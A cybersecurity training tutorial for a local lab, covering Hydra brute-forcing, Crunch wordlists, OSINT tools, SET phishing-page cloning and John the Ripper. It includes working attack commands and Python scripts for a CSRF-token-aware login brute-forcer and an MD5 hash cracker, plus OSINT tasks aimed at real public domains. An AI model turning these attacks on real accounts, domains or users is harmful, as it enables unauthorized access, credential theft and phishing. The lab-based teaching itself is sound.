Password cracking attack demonstration

Day 6: Password Attacks, OSINT & Social Engineering Tools

Cracking & OSINT: Hydra, Crunch, Sherlock & Maltego

Password attacks, Open-Source Intelligence (OSINT), and social engineering are critical techniques in penetration testing, enabling security professionals to identify weak credentials, gather intelligence, and simulate human-based attacks. Parrot OS, a Debian-based Linux distribution designed for cybersecurity, provides a robust suite of tools for these purposes. On Day 6 of this 7-day learning series, we explore password cracking, intelligence gathering, and social engineering. This article covers brute-forcing logins with Hydra, creating custom wordlists with Crunch, performing OSINT with Sherlock, theHarvester, and Maltego, and setting up social engineering attacks with the Social-Engineer Toolkit (SET). Additional tools like John the Ripper and Recon-ng are included to enhance your capabilities. By mastering these tools and techniques, you will be equipped to conduct ethical password attacks, gather actionable intelligence, and simulate social engineering in a controlled environment.

Understanding Password Attacks, OSINT, and Social Engineering

Password attacks exploit weak or predictable credentials, OSINT leverages publicly available data for reconnaissance, and social engineering manipulates human behavior to gain unauthorized access. Below, we outline these concepts to provide context for the tools covered.

Password Attacks

Password attacks attempt to recover or bypass authentication credentials. Common methods include:

  • Brute-Force Attacks: Trying all possible combinations of characters.
  • Dictionary Attacks: Using a predefined list of common passwords or phrases.
  • Hybrid Attacks: Combining dictionary words with variations (e.g., adding numbers).

These attacks target login forms, SSH, or other services, often exploiting weak passwords like password123.

Open-Source Intelligence (OSINT)

OSINT involves collecting and analyzing publicly available data from sources like social media, websites, and public records. It helps map a target’s digital footprint, identifying usernames, emails, or infrastructure.

  • Example: Finding employee emails on LinkedIn for targeted phishing.
  • Impact: Reveals potential attack vectors without direct interaction.

Social Engineering

Social engineering exploits human psychology to gain access or information, often through phishing, pretexting, or impersonation.

  • Example: Sending a fake login page to capture credentials.
  • Impact: Bypasses technical controls by targeting users.

Task: Research one social engineering technique (e.g., phishing or pretexting) and describe how it could be used in a controlled test environment.

Outcome: You understand the principles of password attacks, OSINT, and social engineering, preparing you for practical application.

Setting Up a Testing Environment

Testing password attacks and social engineering requires a controlled environment. We use Damn Vulnerable Web Application (DVWA) and a local SSH server for password attacks, and a virtualized network for social engineering.

Verifying DVWA

Ensure DVWA (set up on Day 4) is operational:

  1. Check LAMP Stack:
    sudo systemctl status apache2
    sudo systemctl status mysql
  2. Access DVWA: Navigate to http://localhost/dvwa, log in with admin/password, and set the security level to “Low”.

Setting Up an SSH Server

An SSH server allows testing brute-force attacks locally.

  1. Install OpenSSH:
    sudo apt install openssh-server
  2. Start SSH Service:
    sudo systemctl start ssh
    sudo systemctl enable ssh
  3. Create a Test User:
    sudo adduser testuser
    Set a weak password (e.g., password123) for testing.

Task: Verify DVWA and set up an SSH server with a test user for brute-force testing.

Outcome: You have a controlled environment for testing password attacks and social engineering.

Brute-Forcing Logins with Hydra

Hydra is a password-cracking tool that performs brute-force and dictionary attacks against various services, including HTTP forms and SSH.

Using Hydra

  1. Brute-Force SSH:
    hydra -l testuser -P /usr/share/wordlists/rockyou.txt -t 4 ssh://localhost
    Attempts to log in as testuser with every password in rockyou.txt (if only rockyou.txt.gz is present, decompress it first). Keep -t 4 for SSH, as Hydra itself recommends: sshd throttles unauthenticated connections (MaxStartups), so more parallel tasks only produce connection errors and skipped passwords.
  2. Brute-Force HTTP Form:
    hydra -l admin -P /usr/share/wordlists/rockyou.txt localhost http-post-form "/dvwa/login.php:username=^USER^&password=^PASS^&Login=Login:Login failed"
    Targets DVWA's login form. The last field is the text that marks a failed attempt: Hydra reports a hit whenever a response does not contain it, so the string must appear on every failed-login page and on nothing else. Caveat: recent DVWA releases add an anti-CSRF field (user_token) to login.php that changes on every page load. Hydra's form modules do not fetch it, so the token check rejects each request before the password is examined, and because that rejection page does not say "Login failed", Hydra reports every password as valid. If that happens, target DVWA's Brute Force module (/dvwa/vulnerabilities/brute/) at Low security instead: it takes username and password as GET parameters and needs only your session cookies (security=low; PHPSESSID=...), which the http-get-form module accepts through its H=Cookie header option, with "Username and/or password incorrect." as the failure string.
  3. Limit Attempts:
    hydra -l admin -P /usr/share/wordlists/rockyou.txt -t 4 localhost http-post-form "/dvwa/login.php:username=^USER^&password=^PASS^&Login=Login:Login failed"
    Limits Hydra to 4 parallel tasks (the default is 16) to reduce load on the target. Also useful: -V prints every attempt, -f stops after the first valid pair, and -e nsr additionally tries an empty password, the username itself and the username reversed.

Ethical Note: Only perform brute-force attacks on systems you own or have explicit permission to test. Unauthorized attempts are illegal.

Task: Use Hydra to brute-force the testuser SSH account and DVWA’s login form with a small wordlist.

Outcome: You can perform brute-force attacks to test credential strength.
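The token problem described above, worked through on a local stand-in for DVWA's login page. This is an added example, not code from the page, from DVWA or from Hydra, and it uses only the Python standard library. LabLogin is a constructed server that issues and checks a user_token the way recent DVWA releases do (the token changes on every page load and is tied to the PHPSESSID cookie; a bad token is rejected before the password is read). brute_force_login is a token-aware dictionary attack, the step Hydra's form modules cannot perform, and run_lab first sends one token-unaware request with the correct password to show the reply Hydra would get. The function names, the random port and the success page (real DVWA redirects to index.php; this target simply omits the failure text, which is the condition Hydra keys on) are this example's assumptions.

```python
import hashlib
import http.server
import re
import secrets
import threading
import urllib.parse
import urllib.request
from http.cookies import SimpleCookie

# Constructed lab target (not DVWA's code). Like recent DVWA releases it keeps an
# unsalted MD5 hash and demands an anti-CSRF "user_token" that is reissued with
# every page and bound to the PHPSESSID cookie; a bad token is rejected before
# the password is looked at, and that rejection page does not say "Login failed".
VALID_USER, VALID_HASH = "admin", hashlib.md5(b"password").hexdigest()
FAIL_STRING = "Login failed"
SESSIONS = {}  # PHPSESSID -> token the next POST from that session must carry
TOKEN_RE = re.compile(r"name='user_token' value='([0-9a-f]+)'")

class LabLogin(http.server.BaseHTTPRequestHandler):
    def log_message(self, *_):
        pass  # keep the lab server quiet

    def _reply(self, sid, html):
        body = html.encode()
        self.send_response(200)
        self.send_header("Set-Cookie", f"PHPSESSID={sid}; path=/")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def _form(self, sid, message):
        SESSIONS[sid] = secrets.token_hex(16)  # fresh token with every page load
        return (f"<p>{message}</p><form method='post'><input name='username'>"
                f"<input name='password'><input type='hidden' name='user_token' "
                f"value='{SESSIONS[sid]}'><input type='submit' name='Login'></form>")

    def _session_id(self):
        cookie = SimpleCookie(self.headers.get("Cookie", ""))
        sid = cookie["PHPSESSID"].value if "PHPSESSID" in cookie else None
        return sid if sid in SESSIONS else secrets.token_hex(8)

    def do_GET(self):
        sid = self._session_id()
        self._reply(sid, self._form(sid, ""))

    def do_POST(self):
        sid = self._session_id()
        raw = self.rfile.read(int(self.headers.get("Content-Length", 0)))
        fields = urllib.parse.parse_qs(raw.decode())
        field = lambda name: fields.get(name, [""])[0]
        if field("user_token") != SESSIONS.get(sid):
            self._reply(sid, self._form(sid, "CSRF token is incorrect"))
        elif (field("username") == VALID_USER
              and hashlib.md5(field("password").encode()).hexdigest() == VALID_HASH):
            self._reply(sid, "<p>Welcome to the lab</p>")  # success: no form, no fail text
        else:
            self._reply(sid, self._form(sid, FAIL_STRING))

def post_login(url, username, password, cookie=None, token=""):
    """One attempt, sent the way a form brute-forcer sends it; returns the body."""
    form = {"username": username, "password": password, "Login": "Login", "user_token": token}
    headers = {"Cookie": cookie} if cookie else {}
    req = urllib.request.Request(url, urllib.parse.urlencode(form).encode(), headers)
    with urllib.request.urlopen(req) as resp:
        return resp.read().decode()

def brute_force_login(url, username, wordlist):
    """Token-aware dictionary attack: hold one session, resend the token that each
    failure page hands back, and treat the absence of FAIL_STRING as success."""
    with urllib.request.urlopen(url) as resp:  # initial GET: cookie + first token
        cookie = resp.headers["Set-Cookie"].split(";")[0]
        token = TOKEN_RE.search(resp.read().decode()).group(1)
    for candidate in wordlist:
        body = post_login(url, username, candidate, cookie, token)
        match = TOKEN_RE.search(body)
        if FAIL_STRING not in body:
            if match:  # a login form without "Login failed" means the token was rejected
                raise RuntimeError("token check failed; this is not a valid password")
            return candidate
        token = match.group(1)
    return None

def run_lab(wordlist, username="admin"):
    """Start the target on a random local port, run both attacks, stop it."""
    server = http.server.ThreadingHTTPServer(("127.0.0.1", 0), LabLogin)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    url = f"http://127.0.0.1:{server.server_address[1]}/login.php"
    try:
        naive = post_login(url, username, "password")  # right password, no cookie, no token
        found = brute_force_login(url, username, wordlist)
    finally:
        server.shutdown()
        server.server_close()
    return naive, found

if __name__ == "__main__":
    naive, found = run_lab(["123456", "letmein", "password", "qwerty"])
    print("without the token, the right password was answered with:", naive[:40])
    print("token-aware attack recovered:", found)
```

Run it as a script to see both results. The lesson carries over to any form brute-forcer: choose a failure string that appears on every failed-login page, confirm a reported hit by hand, and when every password comes back "valid", look for a token check or lockout page that is answering instead of the login logic.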

Wordlist Creation with Crunch

Crunch generates custom wordlists for password attacks, allowing tailored combinations of characters, numbers, and symbols.

Using Crunch

  1. Basic Wordlist:
    crunch 4 4 0123456789 -o numbers.txt
    Generates every 4-digit number (0000–9999, 10,000 lines). The third argument is the character set: giving only 0123 would produce the 256 combinations of those four characters (0000–3333), not all PINs.
  2. Custom Patterns:
    crunch 6 6 -t pass^^ -o custom.txt
    Creates 6-character passwords starting with "pass" followed by two symbols (e.g., pass!!, pass#$). In a -t pattern, @ stands for a lowercase letter, , for an uppercase letter, % for a digit and ^ for a symbol; any other character is kept literally, so pass@@ would yield passaa–passzz instead.
  3. Character Sets:
    crunch 5 5 -f /usr/share/crunch/charset.lst lalpha -o lowercase.txt
    Uses the lalpha set (lowercase letters) from crunch's charset file for 5-character passwords; the file also defines ualpha, numeric, mixalpha-numeric and others. Read the size crunch prints before it starts writing: 26^5 is already 11.8 million lines, and an 8-character alphanumeric list runs to terabytes.

Task: Generate a wordlist with Crunch (e.g., 4-character alphanumeric) and use it with Hydra to brute-force DVWA’s login.

Outcome: You can create custom wordlists to enhance password attack efficiency.
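To see what the three commands above produce before writing gigabytes to disk, the following added example (mine, not part of the page or of crunch) re-implements crunch's charset and -t placeholder semantics in Python so a wordlist can be sized and generated offline. The symbol set behind ^ is this example's assumption (Python's string.punctuation, 32 characters; crunch's own list differs slightly), and the function names are hypothetical.

```python
import itertools
import string

# Placeholder classes as crunch's -t option defines them:
#   @ lowercase letter   , uppercase letter   % digit   ^ symbol
# The symbol set used for ^ is this example's assumption (string.punctuation,
# 32 characters); crunch's own symbol list differs slightly.
PLACEHOLDERS = {
    "@": string.ascii_lowercase,
    ",": string.ascii_uppercase,
    "%": string.digits,
    "^": string.punctuation,
}

def expand_pattern(pattern):
    """Yield every word matching a crunch-style pattern, e.g. pass%% -> pass00..pass99.
    Characters that are not placeholders are kept literally."""
    slots = [PLACEHOLDERS.get(ch, ch) for ch in pattern]  # a literal is a 1-element set
    for combo in itertools.product(*slots):
        yield "".join(combo)

def pattern_size(pattern):
    """How many words the pattern expands to, without generating them."""
    size = 1
    for ch in pattern:
        size *= len(PLACEHOLDERS.get(ch, ch))
    return size

def charset_size(min_len, max_len, charset):
    """Words produced by `crunch <min> <max> <charset>` over every length in the range."""
    return sum(len(charset) ** n for n in range(min_len, max_len + 1))

def expand_charset(min_len, max_len, charset):
    """Yield what `crunch <min> <max> <charset>` writes, in crunch's order
    (shorter words first, rightmost position varying fastest)."""
    for n in range(min_len, max_len + 1):
        for combo in itertools.product(charset, repeat=n):
            yield "".join(combo)

def write_wordlist(path, words):
    """Equivalent of -o: one candidate per line. Returns the line count."""
    count = 0
    with open(path, "w") as out:
        for word in words:
            out.write(word + "\n")
            count += 1
    return count

if __name__ == "__main__":
    # Size the page's lists before writing any of them.
    print("crunch 4 4 0123         ->", charset_size(4, 4, "0123"), "words")
    print("crunch 4 4 0123456789   ->", charset_size(4, 4, "0123456789"), "words")
    print("crunch 6 6 -t pass@@    ->", pattern_size("pass@@"), "words")
    print("crunch 6 6 -t pass^^    ->", pattern_size("pass^^"), "words")
    print("4-char alphanumeric     ->", charset_size(4, 4, string.ascii_lowercase + string.digits), "words")
    print("wrote", write_wordlist("custom.txt", expand_pattern("pass^^")), "lines to custom.txt")
```

Sizing first is the habit worth keeping: a pattern that fixes most positions (pass^^) is a thousand lines, while a full charset over the same length is tens of millions, and Hydra at a few hundred attempts per second will not get through the latter in a lab session.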

OSINT with Sherlock

Sherlock searches social media platforms for usernames, aiding in OSINT by identifying a target’s online presence.

Using Sherlock

  1. Install Sherlock (if not pre-installed):
    git clone https://github.com/sherlock-project/sherlock.git
    cd sherlock
    pip3 install -r requirements.txt
  2. Basic Search:
    python3 sherlock.py username
    Searches for username across the sites Sherlock knows about. In current checkouts the script lives in a package directory, so run python3 sherlock from the repository root instead, or simply sherlock if it is installed as a package. Sherlock decides whether an account exists from each site's response (status code, an error message or a redirect), so expect some false positives on sites that answer every profile URL the same way, and confirm interesting hits by hand.
  3. Output to File:
    python3 sherlock.py username --output results.txt
    Writes the found profile URLs to results.txt instead of only printing them.

Task: Use Sherlock to search for a common username (e.g., john) and review the platforms where it appears.

Outcome: You can gather OSINT on usernames across social media.

OSINT with theHarvester

theHarvester collects emails, subdomains, and hosts associated with a domain, enhancing OSINT capabilities.

Using theHarvester

  • Basic Search:
    theharvester -d example.com -b google
    Queries Google for emails, hosts and subdomains related to example.com. The list of -b sources changes between releases and several of them need an API key in the tool's api-keys file, so check the help output first; in recent releases the command is spelled theHarvester (capital H), so try that if the lowercase name is not found.
  • Multiple Sources:
    theharvester -d example.com -b all
    Queries every source; slower, and sources whose key is missing report an error rather than results.
  • Save Output:
    theharvester -d example.com -b google -f results.html
    Saves the results to a file. Older releases wrote HTML; current ones write XML and JSON files named after the argument, so pass a plain base name such as results there.

Task: Run theHarvester on a public domain (e.g., tesla.com) and analyze the collected emails and subdomains.

Outcome: You can collect comprehensive OSINT data for a target domain.

OSINT with Maltego

Maltego is a graphical OSINT tool that visualizes relationships between entities (e.g., people, domains, emails).

Using Maltego

  1. Launch Maltego:
    maltego
    Open Maltego from the Parrot menu or run it from a terminal. The bundled Community Edition asks for a free Maltego account on first start and caps the number of results a transform returns.
  2. Create a New Graph:
    • Select “New Graph” and add an entity (e.g., Domain: example.com).
    • Run transforms (e.g., “To Emails,” “To Subdomains”).
  3. Analyze Results: Review the visual graph for relationships and save the output.

Task: Use Maltego to map relationships for a public domain and export the graph.

Outcome: You can visualize OSINT data with Maltego’s graphical interface.

Social Engineering with SET

The Social-Engineer Toolkit (SET) automates social engineering attacks, such as phishing and credential harvesting.

Using SET

  1. Launch SET:
    sudo setoolkit
  2. Configure a Phishing Attack:
    • Select "Social-Engineering Attacks" > "Website Attack Vectors" > "Credential Harvester Attack Method."
    • Choose "Site Cloner" and enter the URL to clone (e.g., http://localhost/dvwa/login.php). SET fetches the page and serves a copy whose form posts back to SET.
    • Set the listening IP (e.g., 192.168.1.101). This is the address victims' browsers connect to, so it must be the IP of your lab interface (check with ip addr), not 127.0.0.1.
    Caveat: SET's harvester listens on port 80 by default, which the Apache instance serving DVWA already holds, so on a single host the harvester cannot bind. Either stop apache2 once the page has been cloned, or set WEB_PORT in SET's set.config to a free port before starting.
  3. Test the Attack: Access the cloned page from another system (or a second VM) and submit credentials. SET prints the captured POST parameters on its console ("WE GOT A HIT!") and saves a report when you stop it with Ctrl+C.

Task: Use SET to create a credential harvesting page for DVWA’s login and test it locally.

Outcome: You can simulate social engineering attacks to test user vulnerabilities.

Additional Tools: John the Ripper and Recon-ng

To enhance your capabilities, Parrot OS includes John the Ripper for password cracking and Recon-ng for advanced OSINT.

John the Ripper

  • Crack Password Hashes:
    john --format=raw-md5 hash.txt
    Cracks the hashes in hash.txt, one per line (optionally as user:hash). John guesses the hash type from its shape, but a bare 32-hex-digit string matches several formats, so name it explicitly; DVWA stores unsalted MD5, hence --format=raw-md5. With no other options John runs its default sequence: single-crack mode, then its built-in wordlist with rules, then incremental brute force. Re-run with --show to print what was cracked; John records results in its pot file and will not crack the same hash twice.
  • Custom Wordlist:
    john --format=raw-md5 --wordlist=custom.txt --rules hash.txt
    Dictionary attack with the Crunch-generated list; --rules turns it into a hybrid attack by mangling each word (case changes, digit and symbol suffixes) as it goes.

Task: Use Crunch to generate a wordlist, then use John the Ripper to crack a sample MD5 hash from DVWA's users table (the hashes DVWA keeps in MySQL and exposes through its SQL Injection module), saved to hash.txt as user:hash.
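What John does with hash.txt, shown on a constructed DVWA-style users table so it runs offline. This is an added example, not John's code or DVWA's: its three functions are the three attack types from the introduction (dictionary, hybrid via a small mangling rule set modelled on John's --rules, and brute force). SAMPLE_HASHES and WORDLIST are constructed here; five of the accounts match DVWA's default credentials, "bob" and his password are invented, and all function names are this example's.

```python
import hashlib
import itertools
import string

ALNUM = string.ascii_lowercase + string.digits  # a typical brute-force charset

def md5_hex(text):
    """Unsalted MD5 as a hex string: the format DVWA stores in its users table."""
    return hashlib.md5(text.encode()).hexdigest()

# Constructed sample standing in for a dump of DVWA's users table. The first five
# are DVWA's default accounts; "bob" is invented to show a password that only a
# mangling rule reaches. Hashes are computed here so the example runs offline.
SAMPLE_HASHES = {
    "admin": md5_hex("password"),
    "gordonb": md5_hex("abc123"),
    "1337": md5_hex("charley"),
    "pablo": md5_hex("letmein"),
    "smithy": md5_hex("password"),
    "bob": md5_hex("Letmein1!"),
}
# Constructed mini wordlist standing in for rockyou.txt.
WORDLIST = ["123456", "password", "qwerty", "letmein", "abc123", "charley", "dragon"]

def dictionary_attack(targets, candidates):
    """Hash each candidate once and look it up against every target hash at the
    same time (this is why unsalted hashes crack so cheaply). Returns {user: plaintext}."""
    by_hash = {}
    for user, digest in targets.items():
        by_hash.setdefault(digest, []).append(user)  # equal passwords share a hash
    found = {}
    for word in candidates:
        for user in by_hash.get(md5_hex(word), ()):
            found[user] = word
        if len(found) == len(targets):
            break
    return found

def hybrid_candidates(word):
    """Mangle one dictionary word the way hybrid attacks (John's --rules) do:
    case variants with digit and symbol suffixes."""
    suffixes = [""] + [str(n) for n in range(100)] + ["!", "1!", "!1", "123"]
    for base in (word, word.capitalize(), word.upper()):
        for suffix in suffixes:
            yield base + suffix

def hybrid_attack(targets, wordlist):
    """Dictionary attack over the mangled forms of every word."""
    return dictionary_attack(targets, (c for w in wordlist for c in hybrid_candidates(w)))

def brute_force(target_hash, charset, max_len):
    """Exhaustive search, shortest words first. 36**3 = 46,656 hashes here, but
    36**8 is about 2.8 trillion: brute force only pays for very short passwords."""
    for length in range(1, max_len + 1):
        for combo in itertools.product(charset, repeat=length):
            word = "".join(combo)
            if md5_hex(word) == target_hash:
                return word
    return None

if __name__ == "__main__":
    print("dictionary:", dictionary_attack(SAMPLE_HASHES, WORDLIST))
    print("hybrid:    ", hybrid_attack(SAMPLE_HASHES, WORDLIST))
    print("brute:     ", brute_force(md5_hex("zz9"), ALNUM, 3))
```

The dictionary pass recovers five accounts from seven words, the hybrid pass adds "bob" because Letmein1! is a mangled dictionary word, and brute force only finds zz9 because it is three characters long; the same ordering (cheap modes first) is what John's default sequence and --rules encode.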

Recon-ng

  • Launch Recon-ng:
    recon-ng
  • Run Modules:
    marketplace install recon/domains-hosts/bing_domain_web
    modules load recon/domains-hosts/bing_domain_web
    options set SOURCE example.com
    run
    Discovers subdomains for example.com via Bing and stores them in the hosts table of the current workspace; list them with show hosts. Recon-ng 5 uses options set; the bare set SOURCE syntax belongs to version 4. Many other modules need an API key, added with keys add.

Task: Use Recon-ng to discover subdomains for a public domain and compare results with theHarvester.

Outcome: You can crack passwords and perform advanced OSINT with John the Ripper and Recon-ng.

Practical Exercise

  1. Verify DVWA and set up an SSH server with a test user.
  2. Use Hydra to brute-force the SSH account and DVWA login.
  3. Generate a wordlist with Crunch and test it with Hydra.
  4. Run Sherlock to search for a username across platforms.
  5. Use theHarvester and Maltego to gather OSINT on a public domain.
  6. Create a phishing page with SET and test credential capture.
  7. Test John the Ripper and Recon-ng on sample data.

Conclusion

Day 6 of this 7-day series has equipped you with the skills to perform password attacks, OSINT, and social engineering using Parrot OS’s powerful tools. By mastering Hydra for brute-forcing, Crunch for wordlist creation, Sherlock, theHarvester, and Maltego for OSINT, and SET for social engineering, along with John the Ripper and Recon-ng, you can effectively test security controls in a controlled environment. These skills are essential for ethical hacking and vulnerability assessment. Continue practicing in a safe, legal setting, and prepare for Day 7, where you will explore post-exploitation and reporting.

Next Steps:

  • Experiment with advanced Hydra options and larger wordlists.
  • Explore additional Recon-ng modules for deeper OSINT.
  • Engage with cybersecurity communities on platforms like X to share insights and learn best practices.
